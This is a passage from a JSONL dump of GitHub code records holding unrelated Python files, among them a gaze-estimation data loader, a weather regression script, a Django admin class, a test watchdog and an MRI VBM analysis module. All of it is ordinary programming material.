xrange(-60,0):\n if self.Map.pointInCSpace(t,node1.state[0]):\n new_node = Node(self.window,node1.state[0], t)\n node1.addChild(new_node)\n if not self.new_nodes.has_key(t):\n self.new_nodes[t] = [new_node]\n else:\n self.new_nodes[t].append(new_node)\n else:\n break\n print \"done: \" + str(a)\n '''\n '''\n for b in self.new_nodes.keys():\n nodes = self.nodes[b]\n print len(self.new_nodes[b])\n for c in self.new_nodes[b]:\n for j in xrange(len(nodes)):\n node2 = nodes[j]\n if not c.state[0].equal(node2.state[0]):\n s = Segment(self.window, c.state[0].copy(), node2.state[0].copy())\n if self.Map.isSegLegal(s, b):\n self.segments.append(s)\n c.addChild(node2) \n print \"second round: \" + str(b)\n print \"Done with Visibility Graph\"\n '''\n \n \n def getNodes(self,i):\n vertices = self.Map.vertices(i)\n nodes = []\n\n for v in vertices:\n nodes.append(Node(self.window, v, i))\n \n nodes.append(self.start)\n nodes.append(self.goal)\n return nodes\n \n \n\n\n\n","repo_name":"jperezdiaz/6.0S78","sub_path":"pset2/VisibilityGraph.py","file_name":"VisibilityGraph.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23042401771","text":"__author__ = 'Aneesh Neelam '\n\nimport os\n\nimport webapp2\nimport jinja2\n\nimport DataStore\nfrom gaesessions import get_current_session\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\nclass StaffHandler(webapp2.RequestHandler):\n def get(self):\n \"\"\"\n Get Request handlers for '/staff'\n \"\"\"\n session = get_current_session()\n if session['type'] != \"Staff\":\n self.redirect('/')\n email = session['email']\n duties = {'start_time': 'Not Assigned', 'end_time': 'Not Assigned', 'work': 'Not Assigned'}\n Orders = DataStore.Orders.all()\n Staff = DataStore.Staff.all()\n for duty in Staff:\n if duty.email == email:\n duties = duty\n\n template_values = {\n 'Staff': duties,\n 'Orders': Orders,\n }\n template = JINJA_ENVIRONMENT.get_template('templates/staff.html')\n self.response.write(template.render(template_values))\n\n\n","repo_name":"aneesh-neelam/RestaurantManagementSystem-GAE","sub_path":"StaffHandlers.py","file_name":"StaffHandlers.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16747099561","text":"from memory_profiler import profile\nimport gc\nimport array\n\n\n@profile(precision=8)\ndef readfilemisc():\n with open(\"experiments/sampledata/lipsum-20word.txt\", encoding='utf-8') as f:\n read_n_chars: str = f.read(10) # read n characters\n\n for line in f:\n s:str = line.strip() \n a = [i for i in range(100000)]\n # print(\"size of file obj: \", sys.getsizeof(f))\n b = array.array('i', [i for i in range(100000)])\n \n \n # print(f.closed)\n f.close()\n # print(f.closed)\n\n\nreadfilemisc()","repo_name":"adarshjhaa100/distributed-database","sub_path":"experiments/memoryprofilertest.py","file_name":"memoryprofilertest.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41193389223","text":"#! /usr/bin/env python\n\nfrom __future__ import print_function, division\n\nimport glob\nimport psutil\nimport sys\nimport time\n\nfrom psutil import AccessDenied, NoSuchProcess\n\ntime.sleep(60)\n\ntestPid = 0\nwhile not testPid:\n print(\"TESTWATCH: Polling\")\n for process in psutil.process_iter():\n try:\n if (\n \"python\" in process.cmdline()[0]\n and \"setup.py\" in process.cmdline()[1]\n and process.cmdline()[2] == \"test\"\n ):\n testPid = process.pid\n print(\"TESTWATCH: Found pid %s\" % testPid)\n except TypeError:\n if (\n \"python\" in process.cmdline[0]\n and \"setup.py\" in process.cmdline[1]\n and process.cmdline[2] == \"test\"\n ):\n testPid = process.pid\n print(\"TESTWATCH: Found pid %s\" % testPid)\n except (IndexError, AccessDenied, NoSuchProcess):\n pass\n time.sleep(10)\n\nnoXMLTime = time.time()\nwhile True:\n foundXML = False\n try:\n time.sleep(10)\n process = psutil.Process(testPid)\n try:\n userCPU = process.cpu_times().user\n except AttributeError:\n userCPU = process.get_cpu_times()[0]\n for xunitFile in glob.iglob(\"nosetests*.xml\"):\n foundXML = True\n\n if not foundXML:\n noXMLTime = time.time()\n else:\n xmlAge = time.time() - noXMLTime\n if xmlAge > 450:\n print(\"TESTWATCH: XML file is %s seconds old. Killing process\" % xmlAge)\n process.terminate()\n time.sleep(10)\n process.kill()\n except:\n sys.exit(0)\n\nsys.exit(0)\n","repo_name":"cms-sw/cms-bot","sub_path":"DMWM/TestWatchdog.py","file_name":"TestWatchdog.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"17997761320","text":"# # class 기본 \n# # ex 스타크래프트\n# name = \"마린\"\n# hp = 40\n# damage = 5\n\n# print(\"{} 유닛이 생성되었습니다.\".format(name))\n# print(\"체력{0}, 공격력 {1}\\n\".format(hp, damage))\n\n# #탱크\n# tank_name = \"탱크\"\n# tank_hp = 150\n# tank_damage = 35\n\n# print(\"{} 유닛이 생성되었습니다.\".format(tank_name))\n# print(\"체력{0}, 공격력 {1}\\n\".format(tank_hp, tank_damage))\n\n# def attack(name, location, damage):\n# print(\"{0} : {1} 방향으로 적군을 공격 합니다. 공격력:{2}\".format(name, location, damage))\n\n# attack(name, \"1시\", damage)\n# attack(tank_name, \"1시\", tank_damage) \n\nclass Unit:\n def __init__(self, name, hp, damage):\n self.name = name\n self.hp = hp\n self.damage = damage\n print(\"{0} 유닛이 생성되었습니다.\".format(self.name))\n print(\"체력 {0}, 공격력{1}\".format(self.hp, self.damage))\n\n\nmarine1 = Unit(\"마린\", 40, 5)\nmarine2 = Unit(\"마린\", 40, 5)\ntank = Unit(\"탱크\", 150, 35)\n\nwraith2 = Unit(\"빼앗은 레이스\", 80, 5)\nwraith2.clocking = True\n\nif wraith2.clocking == True:\n print(\"{0}은 현재 클로킹 상태 입니다.\".format(wraith2.name))\n\n\n","repo_name":"changwon231/1_python","sub_path":"basic/23.class.py","file_name":"23.class.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6583147070","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom . import models\n\n# Register your models here.\n@admin.register(models.User)\n# class CustomUserAdmin(admin.ModelAdmin):\n#\nclass CustomUserAdmin(UserAdmin):\n list_display = (\n \"username\",\n \"first_name\",\n \"last_name\",\n \"email\",\n \"language\",\n \"currency\",\n \"gender\",\n \"language\",\n \"currency\",\n \"is_superhost\",\n \"is_staff\",\n \"email_verified\",\n \"login_method\",\n )\n\n list_filter = (\"is_superhost\", \"language\", \"currency\", \"is_superuser\", \"is_staff\")\n # default UserAmdin.fieldsets + CustomFieldSets\n fieldsets = UserAdmin.fieldsets + (\n (\n \"User Informations\",\n {\n \"fields\": (\n \"avatar\",\n \"gender\",\n \"language\",\n \"currency\",\n \"is_superhost\",\n \"birthday\",\n \"bio\",\n \"login_method\",\n \"email_verified\",\n ),\n },\n ),\n )\n","repo_name":"pleed0215/django_bnb","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70024886595","text":"import os\nimport cv2 \nimport torch\nimport random\nimport numpy as np\nimport numpy.matlib as matlib\nfrom easydict import EasyDict as edict\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\nimport readcam\n\n\ndef Decode_ETH(line):\n anno = edict()\n anno.face = line[0]\n anno.gaze2d = line[1]\n anno.head2d = line[2]\n anno.name = line[3]\n anno.cam = line[4]\n anno.norm = line[6]\n\n anno.landmarks = line[8] \n return anno\n\ndef gazeto3d(gaze):\n assert gaze.size == 2, \"The size of gaze must be 2\"\n gaze_gt = np.zeros([3])\n gaze_gt[0] = -np.cos(gaze[0]) * np.sin(gaze[1])\n gaze_gt[1] = -np.sin(gaze[0])\n gaze_gt[2] = -np.cos(gaze[0]) * np.cos(gaze[1])\n return gaze_gt\n\n\ndef Decode_Dict():\n mapping = edict()\n mapping.ethtrain = Decode_ETH\n return mapping\n\n\ndef long_substr(str1, str2):\n substr = ''\n for i in range(len(str1)):\n for j in range(len(str1)-i+1):\n if j > len(substr) and (str1[i:i+j] in str2):\n substr = str1[i:i+j]\n return len(substr)\n\n\ndef Get_Decode(name):\n mapping = Decode_Dict()\n keys = list(mapping.keys())\n name = name.lower()\n score = [long_substr(name, i) for i in keys]\n key = keys[score.index(max(score))]\n return mapping[key]\n \n\nclass trainloader(Dataset): \n\n def __init__(self, dataset):\n\n # Read source data\n self.data = edict() \n self.data.line = []\n\n self.data.root = dataset.image\n\n self.data.decode = Get_Decode(dataset.name)\n\n self.data.cam_params = readcam.cam_params\n\n self.data.label = [self.__readlabel(dataset.label_cam1), \n self.__readlabel(dataset.label_cam2)]\n \n # build transforms\n self.transforms = transforms.Compose([\n transforms.ToTensor()\n ])\n\n\n def __readlabel(self, label, header=True):\n\n data = []\n\n if isinstance(label, list):\n\n for i in label:\n\n with open(i) as f: \n line = f.readlines()\n\n if header: \n line.pop(0)\n\n data.extend(line)\n else:\n with open(label) as f: \n data = f.readlines()\n\n if header: \n data.pop(0)\n\n return data\n\n\n\n def __len__(self):\n\n return len(self.data.label[0])\n\n def __gaussmap(self, center_x, center_y, R=20, IMAGE_HEIGHT=224, IMAGE_WIDTH=224):\n mask_x = matlib.repmat(center_x, IMAGE_HEIGHT, IMAGE_WIDTH)\n mask_y = matlib.repmat(center_y, IMAGE_HEIGHT, IMAGE_WIDTH)\n \n x1 = np.arange(IMAGE_WIDTH)\n x_map = matlib.repmat(x1, IMAGE_HEIGHT, 1)\n \n y1 = np.arange(IMAGE_HEIGHT)\n y_map = matlib.repmat(y1, IMAGE_WIDTH, 1)\n y_map = np.transpose(y_map)\n \n Gauss_map = np.sqrt((x_map-mask_x)**2+(y_map-mask_y)**2)\n \n Gauss_map = np.exp(-0.5*Gauss_map/R)\n\n return Gauss_map\n\n def __getitem__(self, idx):\n\n \n images = []\n labels = []\n cams = []\n poses = []\n names = []\n maps = []\n\n count = 0\n for label in self.data.label:\n\n # Read souce information\n line = label[idx]\n line = line.strip().split(\" \")\n anno = self.data.decode(line)\n\n # Image\n img = cv2.imread(os.path.join(self.data.root, anno.face))\n img = self.transforms(img)\n img = img.unsqueeze(0)\n images.append(img)\n\n # Label\n label = np.array(anno.gaze2d.split(\",\")).astype(\"float\")\n # label = gazeto3d(label)\n label = torch.from_numpy(label).type(torch.FloatTensor)\n label = label.unsqueeze(0)\n labels.append(label)\n\n # Camera rotation. Label = R * prediction\n norm_mat = np.array(anno.norm.split(\",\")).astype('float')\n norm_mat = np.resize(norm_mat, (3, 3))\n\n cam_mat = self.data.cam_params[int(anno.cam)-1].rotation\n\n new_mat = np.dot(norm_mat, cam_mat)\n inv_mat = np.linalg.inv(new_mat)\n inv_mat = torch.from_numpy(inv_mat).type(torch.FloatTensor)\n\n new_mat = torch.from_numpy(new_mat).type(torch.FloatTensor)\n new_mat = new_mat.unsqueeze(0)\n\n cams.append(inv_mat)\n\n # Pos.\n z_axis = np.linalg.inv(new_mat)[:, 2].flatten()\n translation = self.data.cam_params[int(anno.cam)-1].translation\n pos = np.concatenate([z_axis, translation], 0)\n pos = torch.from_numpy(pos).type(torch.FloatTensor)\n pos = pos.unsqueeze(0) \n poses.append(pos)\n\n\n count = 0\n\n # Name\n names.append(anno.name)\n\n label_dict = edict()\n label_dict.gaze = torch.cat(labels, 0)\n\n label_dict.name = names[0]\n\n\n data = edict()\n data.face = torch.cat(images, 0)\n data.cams = torch.cat(cams, 0)\n data.pos = torch.cat(poses, 0)\n data.name = names\n\n return data, label_dict\n\ndef loader(source, batch_size, shuffle=True, num_workers=0):\n dataset = trainloader(source)\n print(f\"-- [Read Data]: Source: {source.image}\")\n print(f\"-- [Read Data]: Total num: {len(dataset)}\")\n load = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)\n return load\n\n","repo_name":"yihuacheng/DVGaze","sub_path":"Code/eth/reader/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":5430,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"11216292840","text":"#\n# [48] Rotate Image\n#\n# https://leetcode.com/problems/rotate-image/description/\n#\n# algorithms\n# Medium (41.31%)\n# Total Accepted: 151.9K\n# Total Submissions: 367.8K\n# Testcase Example: '[[1,2,3],[4,5,6],[7,8,9]]'\n#\n# You are given an n x n 2D matrix representing an image.\n# \n# Rotate the image by 90 degrees (clockwise).\n# \n# Note:\n# You have to rotate the image in-place, which means you have to modify the\n# input 2D matrix directly. DO NOT allocate another 2D matrix and do the\n# rotation.\n# \n# \n# Example 1:\n# \n# Given input matrix = \n# [\n# ⁠ [1,2,3],\n# ⁠ [4,5,6],\n# ⁠ [7,8,9]\n# ],\n# \n# rotate the input matrix in-place such that it becomes:\n# [\n# ⁠ [7,4,1],\n# ⁠ [8,5,2],\n# ⁠ [9,6,3]\n# ]\n# \n# \n# \n# Example 2:\n# \n# Given input matrix =\n# [\n# ⁠ [ 5, 1, 9,11],\n# ⁠ [ 2, 4, 8,10],\n# ⁠ [13, 3, 6, 7],\n# ⁠ [15,14,12,16]\n# ], \n# \n# rotate the input matrix in-place such that it becomes:\n# [\n# ⁠ [15,13, 2, 5],\n# ⁠ [14, 3, 4, 1],\n# ⁠ [12, 6, 8, 9],\n# ⁠ [16, 7,10,11]\n# ]\n# \n# \n#\nclass Solution: \n def rotate(self, matrix): \n \"\"\" \n :type matrix: List[List[int]] \n :rtype: void Do not return anything, modify matrix in-place instead. \n \"\"\" \n # 5 star, no idea.\n n = len(matrix) \n for i in range(n): \n for j in range(i+1, n): \n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j] \n for i in range(n):\n matrix[i].reverse() \n","repo_name":"goalong/lc","sub_path":"v1/48.rotate-image.136237871.ac.python3.py","file_name":"48.rotate-image.136237871.ac.python3.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"25208588705","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split, GridSearchCV\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.linear_model import LinearRegression\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.linear_model import Ridge, Lasso\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score, f1_score\r\n\r\n# Load and preprocess data\r\ndata = pd.read_csv(r'C:\\Users\\white\\Desktop\\Dissertation\\data\\weather_data_cleaned.csv')\r\n\r\nX = data[['dew_point',\r\n'feels_like',\r\n'temp_min',\r\n'temp_max',\r\n'pressure',\r\n'humidity',\r\n'wind_speed',\r\n'wind_deg',\r\n'snow_1h',\r\n'clouds_all']]\r\ny_precipitation = data['rain_1h'] # Combined precipitation from both columns\r\ny_mean_temperature = data['temp']\r\n\r\n# Feature Scaling\r\nscaler = StandardScaler()\r\nX_scaled = scaler.fit_transform(X)\r\n\r\n# Create lag features for sequences\r\nsequence_length = 7 # Number of past days to consider for prediction\r\nX_sequences = []\r\ny_sequences_precip = []\r\ny_sequences_temp = []\r\n\r\nfor i in range(len(X_scaled) - sequence_length):\r\n X_sequences.append(X_scaled[i:i+sequence_length])\r\n y_sequences_precip.append(y_precipitation[i+sequence_length])\r\n y_sequences_temp.append(y_mean_temperature[i+sequence_length])\r\n\r\nX_sequences = np.array(X_sequences)\r\ny_sequences_precip = np.array(y_sequences_precip)\r\ny_sequences_temp = np.array(y_sequences_temp)\r\n\r\nprint(y_sequences_temp)\r\n\r\n# Train-test split\r\nX_train, X_test, y_precip_train, y_precip_test, y_temp_train, y_temp_test = train_test_split(\r\n X_sequences, y_sequences_precip, y_sequences_temp, test_size=0.1, random_state=42, shuffle=False\r\n)\r\n\r\n# Reshape sequences for Linear Regression\r\nX_train_reshaped = X_train.reshape(X_train.shape[0], -1)\r\nX_test_reshaped = X_test.reshape(X_test.shape[0], -1)\r\n\r\n# Train Linear Regression model\r\nmodel_precip = LinearRegression()\r\nmodel_temp = LinearRegression()\r\n\r\nmodel_precip.fit(X_train_reshaped, y_precip_train)\r\nmodel_temp.fit(X_train_reshaped, y_temp_train)\r\n\r\n# Predict for the upcoming week\r\nweek_weather_pred = model_temp.predict(X_test_reshaped)\r\nweek_precip_pred = model_precip.predict(X_test_reshaped)\r\n\r\n# Evaluation metrics\r\ndef evaluate_metrics(y_true, y_pred):\r\n r2 = r2_score(y_true, y_pred)\r\n mse = mean_squared_error(y_true, y_pred)\r\n rmse = np.sqrt(mse)\r\n mae = mean_absolute_error(y_true, y_pred)\r\n return r2, mse, rmse, mae\r\n\r\ndef evaluate_f1(y_true, y_pred):\r\n y_pred_class = np.where(y_pred > 0.5, 1, 0) # Convert to binary classes\r\n f1 = f1_score(y_true, y_pred_class)\r\n return f1\r\n\r\n# Evaluate Linear Regression (Mean Temperature)\r\nr2_linear_temp, mse_linear_temp, rmse_linear_temp, mae_linear_temp = evaluate_metrics(y_temp_test, week_weather_pred)\r\n\r\n\r\n# Evaluate Linear Regression (Precipitation)\r\nr2_linear_precip, mse_linear_precip, rmse_linear_precip, mae_linear_precip = evaluate_metrics(y_precip_test, week_precip_pred)\r\n\r\n\r\n# Print evaluation metrics\r\nprint(\"Linear Regression Metrics (Mean Temperature):\")\r\nprint(f'R-squared (R2): {r2_linear_temp:.2f}')\r\nprint(f'Mean Squared Error (MSE): {mse_linear_temp:.2f}')\r\nprint(f'Root Mean Squared Error (RMSE): {rmse_linear_temp:.2f}')\r\nprint(f'Mean Absolute Error (MAE): {mae_linear_temp:.2f}')\r\n\r\n\r\nprint(\"Linear Regression Metrics (Precipitation):\")\r\nprint(f'R-squared (R2): {r2_linear_precip:.2f}')\r\nprint(f'Mean Squared Error (MSE): {mse_linear_precip:.2f}')\r\nprint(f'Root Mean Squared Error (RMSE): {rmse_linear_precip:.2f}')\r\nprint(f'Mean Absolute Error (MAE): {mae_linear_precip:.2f}')\r\n\r\n\r\n# Visualization\r\ndays = range(len(y_temp_test))\r\nplt.plot(days, y_temp_test, label='Actual Mean Temp', marker='o')\r\nplt.plot(days, week_weather_pred, label='Predicted Mean Temp', marker='o')\r\nplt.xlabel('Days')\r\nplt.ylabel('Mean Temperature')\r\nplt.title('Predicted Mean Temperature for Upcoming Week')\r\nplt.legend()\r\nplt.show()\r\n\r\nplt.plot(days, y_precip_test, label='Actual Precipitation', marker='o')\r\nplt.plot(days, week_precip_pred, label='Predicted Precipitation', marker='o')\r\nplt.xlabel('Days')\r\nplt.ylabel('Precipitation')\r\nplt.title('Predicted Precipitation for Upcoming Week')\r\nplt.legend()\r\nplt.show()\r\n\r\n# Hyperparameter tuning using GridSearchCV for Ridge Regression\r\nparam_grid_ridge = {\r\n 'alpha': [0.01, 0.1, 1, 10, 100]\r\n}\r\n\r\ngrid_search_ridge_precip = GridSearchCV(Ridge(), param_grid_ridge, cv=5)\r\ngrid_search_ridge_precip.fit(X_train, y_precip_train)\r\n\r\ngrid_search_ridge_temp = GridSearchCV(Ridge(), param_grid_ridge, cv=5)\r\ngrid_search_ridge_temp.fit(X_train, y_temp_train)\r\n\r\nbest_ridge_model_precip = grid_search_ridge_precip.best_estimator_\r\nbest_ridge_model_temp = grid_search_ridge_temp.best_estimator_\r\n\r\n# Hyperparameter tuning using GridSearchCV for Lasso Regression\r\nparam_grid_lasso = {\r\n 'alpha': [0.01, 0.1, 1, 10, 100]\r\n}\r\n\r\ngrid_search_lasso_precip = GridSearchCV(Lasso(), param_grid_lasso, cv=5)\r\ngrid_search_lasso_precip.fit(X_train, y_precip_train)\r\n\r\ngrid_search_lasso_temp = GridSearchCV(Lasso(), param_grid_lasso, cv=5)\r\ngrid_search_lasso_temp.fit(X_train, y_temp_train)\r\n\r\nbest_lasso_model_precip = grid_search_lasso_precip.best_estimator_\r\nbest_lasso_model_temp = grid_search_lasso_temp.best_estimator_\r\n\r\n# Visualization of Ridge Regression hyperparameter tuning results\r\nresults_ridge_precip = grid_search_ridge_precip.cv_results_\r\nresults_ridge_temp = grid_search_ridge_temp.cv_results_\r\n\r\nplt.figure(figsize=(12, 6))\r\n\r\nplt.subplot(1, 2, 1)\r\nplt.plot(param_grid_ridge['alpha'], results_ridge_precip['mean_test_score'], marker='o')\r\nplt.title('Hyperparameter Tuning (Ridge): Precipitation Prediction')\r\nplt.xlabel('Alpha')\r\nplt.ylabel('Mean Test Score')\r\n\r\nplt.subplot(1, 2, 2)\r\nplt.plot(param_grid_ridge['alpha'], results_ridge_temp['mean_test_score'], marker='o')\r\nplt.title('Hyperparameter Tuning (Ridge): Mean Temperature Prediction')\r\nplt.xlabel('Alpha')\r\nplt.ylabel('Mean Test Score')\r\n\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n# Visualization of Lasso Regression hyperparameter tuning results\r\nresults_lasso_precip = grid_search_lasso_precip.cv_results_\r\nresults_lasso_temp = grid_search_lasso_temp.cv_results_\r\n\r\nplt.figure(figsize=(12, 6))\r\n\r\nplt.subplot(1, 2, 1)\r\nplt.plot(param_grid_lasso['alpha'], results_lasso_precip['mean_test_score'], marker='o')\r\nplt.title('Hyperparameter Tuning (Lasso): Precipitation Prediction')\r\nplt.xlabel('Alpha')\r\nplt.ylabel('Mean Test Score')\r\n\r\nplt.subplot(1, 2, 2)\r\nplt.plot(param_grid_lasso['alpha'], results_lasso_temp['mean_test_score'], marker='o')\r\nplt.title('Hyperparameter Tuning (Lasso): Mean Temperature Prediction')\r\nplt.xlabel('Alpha')\r\nplt.ylabel('Mean Test Score')\r\n\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n# Predict for the upcoming week using Ridge Regression models\r\nweek_weather_pred_ridge_temp = best_ridge_model_temp.predict(X_test)\r\nweek_precip_pred_ridge = best_ridge_model_precip.predict(X_test)\r\n\r\n# Predict for the upcoming week using Lasso Regression models\r\nweek_weather_pred_lasso_temp = best_lasso_model_temp.predict(X_test)\r\nweek_precip_pred_lasso = best_lasso_model_precip.predict(X_test)\r\n\r\n\r\n# Evaluate Ridge Regression (Mean Temperature)\r\nr2_ridge_temp, mse_ridge_temp, rmse_ridge_temp, mae_ridge_temp = evaluate_metrics(y_temp_test, week_weather_pred_ridge_temp)\r\nf1_ridge_temp = evaluate_f1(y_temp_test, week_weather_pred_ridge_temp)\r\n\r\n# Evaluate Ridge Regression (Precipitation)\r\nr2_ridge_precip, mse_ridge_precip, rmse_ridge_precip, mae_ridge_precip = evaluate_metrics(y_precip_test, week_precip_pred_ridge)\r\nf1_ridge_precip = evaluate_f1(y_precip_test, week_precip_pred_ridge)\r\n\r\n# Evaluate Lasso Regression (Mean Temperature)\r\nr2_lasso_temp, mse_lasso_temp, rmse_lasso_temp, mae_lasso_temp = evaluate_metrics(y_temp_test, week_weather_pred_lasso_temp)\r\nf1_lasso_temp = evaluate_f1(y_temp_test, week_weather_pred_lasso_temp)\r\n\r\n# Evaluate Lasso Regression (Precipitation)\r\nr2_lasso_precip, mse_lasso_precip, rmse_lasso_precip, mae_lasso_precip = evaluate_metrics(y_precip_test, week_precip_pred_lasso)\r\nf1_lasso_precip = evaluate_f1(y_precip_test, week_precip_pred_lasso)\r\n\r\n# Print evaluation metrics\r\nprint(\"Ridge Regression Metrics (Mean Temperature):\")\r\nprint(f'R-squared (R2): {r2_ridge_temp:.2f}')\r\nprint(f'Mean Squared Error (MSE): {mse_ridge_temp:.2f}')\r\nprint(f'Root Mean Squared Error (RMSE): {rmse_ridge_temp:.2f}')\r\nprint(f'Mean Absolute Error (MAE): {mae_ridge_temp:.2f}')\r\nprint(f'F1 Score: {f1_ridge_temp:.2f}')\r\n\r\nprint(\"Ridge Regression Metrics (Precipitation):\")\r\nprint(f'R-squared (R2): {r2_ridge_precip:.2f}')\r\nprint(f'Mean Squared Error (MSE): {mse_ridge_precip:.2f}')\r\nprint(f'Root Mean Squared Error (RMSE): {rmse_ridge_precip:.2f}')\r\nprint(f'Mean Absolute Error (MAE): {mae_ridge_precip:.2f}')\r\nprint(f'F1 Score: {f1_ridge_precip:.2f}')\r\n\r\nprint(\"Lasso Regression Metrics (Mean Temperature):\")\r\nprint(f'R-squared (R2): {r2_lasso_temp:.2f}')\r\nprint(f'Mean Squared Error (MSE): {mse_lasso_temp:.2f}')\r\nprint(f'Root Mean Squared Error (RMSE): {rmse_lasso_temp:.2f}')\r\nprint(f'Mean Absolute Error (MAE): {mae_lasso_temp:.2f}')\r\nprint(f'F1 Score: {f1_lasso_temp:.2f}')\r\n\r\nprint(\"Lasso Regression Metrics (Precipitation):\")\r\nprint(f'R-squared (R2): {r2_lasso_precip:.2f}')\r\nprint(f'Mean Squared Error (MSE): {mse_lasso_precip:.2f}')\r\nprint(f'Root Mean Squared Error (RMSE): {rmse_lasso_precip:.2f}')\r\nprint(f'Mean Absolute Error (MAE): {mae_lasso_precip:.2f}')\r\nprint(f'F1 Score: {f1_lasso_precip:.2f}')","repo_name":"qt22010/Dissertation","sub_path":"Failed/Linear fixed mayb test1.py","file_name":"Linear fixed mayb test1.py","file_ext":"py","file_size_in_byte":9477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71724386113","text":"import os\nimport shutil\nfrom shutil import move\n\nimport numpy\n\nfrom data import plot_data\nfrom group.SPMModels import SPMModels\nfrom utility.images.Image import Image\nfrom utility.matlab import call_matlab_spmbatch\nfrom utility.myfsl.utils.run import rrun\nfrom utility.fileutilities import sed_inplace, get_dirname\nfrom utility.utilities import listToString\nfrom utility.fileutilities import sed_inplace\nfrom utility.utilities import get_col_from_listmatrix\n\nclass GroupAnalysis:\n\n def __init__(self, proj):\n\n self.subjects_list = None\n self.working_dir = \"\"\n self.project = proj\n self._global = self.project.globaldata\n\n self.spm = SPMModels(proj)\n\n # ---------------------------------------------------\n #region DATA PREPARATION\n # ====================================================================================================================================================\n\n # given a subjects list, it creates their template and project all the c1 images to its normalized version\n # create a folder name and its subfolders : subjects (normalized images), flowfields, stats\n # RC1_IMAGES: { '/media/data/MRI/projects/ELA/subjects/0202/s1/mpr/rc20202-t1.nii,1'\n # '/media/data/MRI/projects/ELA/subjects/0503/s1/mpr/rc20503-t1.nii,1'}\n def create_vbm_spm_template_normalize(self, name, subjects_list, spm_template_name=\"group_spm_dartel_createtemplate_normalize\"):\n\n self.subjects_list = subjects_list\n if len(self.subjects_list) == 0:\n print(\"ERROR in create_vbm_spm_template_normalize, given subjs params is neither a string nor a list\")\n return\n\n self.working_dir = os.path.join(self.project.vbm_dir, name)\n\n out_batch_job, out_batch_start = self.project.adapt_batch_files(spm_template_name, \"mpr\", \"vbmtemplnorm_\" + name)\n\n # =======================================================\n # START !!!!\n # =======================================================\n # create job file\n T1_darteled_images_1 = \"{\\r\"\n T1_darteled_images_2 = \"{\\r\"\n T1_images_1 = \"{\\r\"\n\n for subj in self.subjects_list:\n T1_darteled_images_1 = T1_darteled_images_1 + \"\\'\" + subj.t1_dartel_rc1.upath + \",1\\'\\r\"\n T1_darteled_images_2 = T1_darteled_images_2 + \"\\'\" + subj.t1_dartel_rc2.upath + \",1\\'\\r\"\n T1_images_1 = T1_images_1 + \"\\'\" + subj.t1_dartel_c1.upath + \"\\'\\r\"\n\n T1_darteled_images_1 = T1_darteled_images_1 + \"\\r}\"\n T1_darteled_images_2 = T1_darteled_images_2 + \"\\r}\"\n T1_images_1 = T1_images_1 + \"\\r}\"\n\n sed_inplace(out_batch_job, \"\", T1_darteled_images_1)\n sed_inplace(out_batch_job, \"\", T1_darteled_images_2)\n sed_inplace(out_batch_job, \"\" , T1_images_1)\n sed_inplace(out_batch_job, \"\", name)\n sed_inplace(out_batch_job, \"\", self.project.vbm_dir)\n\n call_matlab_spmbatch(out_batch_start, [self._global.spm_functions_dir, self._global.spm_dir])\n print(\"running SPM batch template: \" + name)\n\n affine_trasf_mat = os.path.join(self.subjects_list[0].t1_spm_dir, name + \"_6_2mni.mat\")\n move(affine_trasf_mat, os.path.join(self.project.vbm_dir, name, \"flowfields\", name + \"_6_2mni.mat\"))\n\n return self.working_dir\n\n # create a fslvbm folder using spm's vbm output\n def create_fslvbm_from_spm(self, subjects_list, smw_folder, vbmfsl_folder):\n\n self.subjects_list = subjects_list\n if len(self.subjects_list) == 0:\n print(\"ERROR in create_fslvbm_from_spm, given subjs params is neither a string nor a list\")\n return\n\n stats_dir = os.path.join(vbmfsl_folder, \"stats\")\n struct_dir = os.path.join(vbmfsl_folder, \"struct\")\n\n os.makedirs(stats_dir, exist_ok=True)\n os.makedirs(struct_dir, exist_ok=True)\n\n for subj in self.subjects_list:\n Image(os.path.join(smw_folder, \"smwc1T1_biascorr_\" + subj.label)).cp(os.path.join(struct_dir, \"smwc1T1_biascorr_\" + subj.label))\n rrun(\"fslmaths \" + os.path.join(struct_dir, \"smwc1T1_biascorr_\" + subj.label) + \" -thr 0.1 \" + os.path.join(struct_dir, \"smwc1T1_biascorr_\" + subj.label))\n\n # create merged image\n # cur_dir = os.getcwd()\n os.chdir(stats_dir)\n\n # trick...since there are nii and nii.gz. by adding \".gz\" in the check I consider only the nii\n images = [os.path.join(struct_dir, f) for f in os.listdir(struct_dir) if 